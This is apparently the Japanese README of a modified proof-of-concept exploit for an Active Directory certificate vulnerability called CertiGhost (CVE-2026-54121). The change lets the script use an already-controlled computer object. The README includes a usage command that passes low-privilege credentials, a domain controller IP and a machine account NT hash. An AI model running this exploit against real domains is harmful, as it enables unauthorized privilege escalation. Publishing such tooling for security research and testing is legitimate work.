
この POC は、https://github.com/aniqfakhrul/CVE-2026-54121/blob/main/certighost.py にあるオリジナルの POC コードを基に、MachineAccountQuota によって一般的に制限される新しいコンピュータの作成に依存するのではなく、すでに制御しているコンピュータオブジェクトを使用するように少し変更したものです。
CertiGhost 脆弱性の詳細については、元の リポジトリ を参照してください。
使用例:
python3 certighost.py -d playground.local -u lowpriv -p Password123 \
--dc-ip 192.168.209.157 \
--computer-name MACHINEA$ \
--computer-hash <NT_HASH_MACHINE_A$>